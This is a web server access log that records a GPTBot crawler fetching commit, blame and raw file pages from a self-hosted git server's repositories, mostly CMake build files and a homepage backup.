"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:14:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16047] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:14:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:14:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20384] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10025] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:14:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:14:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12009] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:14:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16400] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9972] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14305] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16919] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" +[17/Feb/2026:14:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" +[17/Feb/2026:14:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" +[17/Feb/2026:14:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11516] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/swagger.js?v=1.25.3" [Client 74.7.227.38] [Length 419897] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/api/swagger" +[17/Feb/2026:14:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode" +[17/Feb/2026:14:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14269] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2frequirements.txt" [Client 74.7.227.38] [Length 24176] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" +[17/Feb/2026:14:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" +[17/Feb/2026:14:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" +[17/Feb/2026:14:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" +[17/Feb/2026:14:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71995] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" +[17/Feb/2026:14:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" +[17/Feb/2026:14:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom7.png" [Client 74.7.227.38] [Length 19850] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" +[17/Feb/2026:14:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 19250] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" +[17/Feb/2026:14:50:15 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/assets/js/'+mi(t[e].href)+'" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/assets/js/swagger.js?v=1.25.3" +[17/Feb/2026:14:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" +[17/Feb/2026:14:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14281] [Gzip 8.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app" [Client 74.7.227.38] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app" +[17/Feb/2026:14:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10463] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" +[17/Feb/2026:14:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 138208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:50:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10464] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" +[17/Feb/2026:14:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10463] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" +[17/Feb/2026:14:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10440] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" +[17/Feb/2026:14:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" +[17/Feb/2026:14:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 